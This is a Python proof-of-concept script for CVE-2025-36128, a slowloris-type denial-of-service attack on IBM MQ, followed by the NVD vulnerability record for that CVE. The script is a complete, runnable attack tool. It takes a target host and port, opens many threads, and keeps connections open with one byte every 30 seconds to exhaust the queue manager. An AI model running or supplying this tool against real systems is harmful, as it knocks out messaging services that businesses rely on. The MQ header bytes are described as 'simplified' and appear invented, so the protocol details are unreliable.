CVE-2025-36128

#!/usr/bin/env python3 """ CVE-2025-36128 - IBM MQ Slow Read DoS PoC This PoC demonstrates a Slowloris-type attack against IBM MQ by exploiting the lack of proper read timeout enforcement. """ import socket import ssl import time import threading import argparse import sys class IBMMQSlowReadDoS: def __init__(self, target_host, target_port, num_threads=50, use_ssl=False, channel=None): self.target_host = target_host self.target_port = target_port self.num_threads = num_threads self.use_ssl = use_ssl self.channel = channel or "SYSTEM.DEF.SVRCONN" self.sockets = [] self.running = True def create_socket(self): """Create a TCP connection to IBM MQ queue manager""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((self.target_host, self.target_port)) if self.use_ssl: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = context.wrap_socket(sock, server_hostname=self.target_host) return sock except Exception as e: print(f"[ERROR] Failed to create socket: {e}") return None def send_mq_initial_header(self, sock): """Send initial MQ TSP (Transmission Segment Protocol) header to establish connection""" # MQ TSP header: 4 bytes length + protocol ID + segment type # This is a simplified initial handshake to initiate MQ communication tsp_header = b'\x00\x00\x00\x28' # Length: 40 bytes tsp_header += b'TSP ' # Protocol identifier tsp_header += b'\x01' # Segment type: initial # MQIH (MQ Initial Header) follows mqih = b'\x00\x00\x00\x00' # StrucId mqih += b'\x01\x00\x00\x00' # Version mqih += b'\x00\x00\x00\x00' # Reserved sock.send(tsp_header + mqih) def slow_read_attack(self, thread_id): """Perform slow read attack on a single connection""" sock = self.create_socket() if not sock: return try: # Send initial MQ header to establish connection self.send_mq_initial_header(sock) print(f"[Thread {thread_id}] Connection established, starting slow read attack...") # Keep connection alive by sending minimal data at very slow rate # This exploits the missing read timeout in IBM MQ counter = 0 while self.running: try: # Send a tiny data fragment every 30 seconds # This keeps the connection from timing out on TCP level # but exploits the missing application-level read timeout sock.send(b'\x00') counter += 1 if counter % 10 == 0: print(f"[Thread {thread_id}] Connection alive, sent {counter} keep-alive bytes") time.sleep(30) except socket.error: print(f"[Thread {thread_id}] Connection lost") break except Exception as e: print(f"[Thread {thread_id}] Error: {e}") finally: try: sock.close() except: pass def launch_attack(self): """Launch the Slowloris-type DoS attack""" print(f"[*] Starting CVE-2025-36128 Slow Read DoS attack") print(f"[*] Target: {self.target_host}:{self.target_port}") print(f"[*] Threads: {self.num_threads}") print(f"[*] SSL: {self.use_ssl}") threads = [] for i in range(self.num_threads): t = threading.Thread(target=self.slow_read_attack, args=(i,)) t.daemon = True threads.append(t) t.start() time.sleep(0.1) # Stagger connection creation print(f"[*] Attack launched with {self.num_threads} slow connections") print("[*] Press Ctrl+C to stop the attack") try: while self.running: time.sleep(1) except KeyboardInterrupt: print("\n[*] Stopping attack...") self.running = False time.sleep(2) print("[*] Attack stopped") if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-36128 IBM MQ Slow Read DoS PoC') parser.add_argument('--host', required=True, help='Target IBM MQ host') parser.add_argument('--port', type=int, default=1414, help='Target port (default: 1414)') parser.add_argument('--threads', type=int, default=50, help='Number of attack threads (default: 50)') parser.add_argument('--ssl', action='store_true', help='Use SSL/TLS connection') args = parser.parse_args() dos = IBMMQSlowReadDoS(args.host, args.port, args.threads, args.ssl) dos.launch_attack()

{"cve": {"id": "CVE-2025-36128", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:33.547", "lastModified": "2025-10-28T16:53:08.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM MQ 9.1, 9.2, 9.3, 9.4 LTS and 9.3, 9.4 CD is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-772"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.1.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "2E9E3A1B-D35D-4029-835C-C27917C2ABD7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.2.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "AF700EBE-9E12-40AD-85B6-2B4C53514EC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.3.0:*:*:*:continuous_delivery:*:*:*", "matchCriteriaId": "89BDCCFD-C1DF-4E19-8597-DF87C56D7E09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.3.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "574B92D2-A5C4-485F-AD8C-D82DC62CE5D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.4.0:*:*:*:continuous_delivery:*:*:*", "matchCriteriaId": "FE929BED-85A5-42DB-AAA4-B3EB90A1231D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.4.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "060C8A17-3897-4A14-AECF-2222313FC61B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:ibm:i:-:*:*:*:*:*:*:*", "matchCriteriaId": "C684FC45-C9BA-4EF0-BD06-BB289450DD21"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}, {"vulnerable": false, "criteria": "cpe:2.3:o:oracle:solaris:-:*:*:*:*:*:*:*", "matchCriteriaId": "91F372EA-3A78-4703-A457-751B2C98D796"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7244480", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}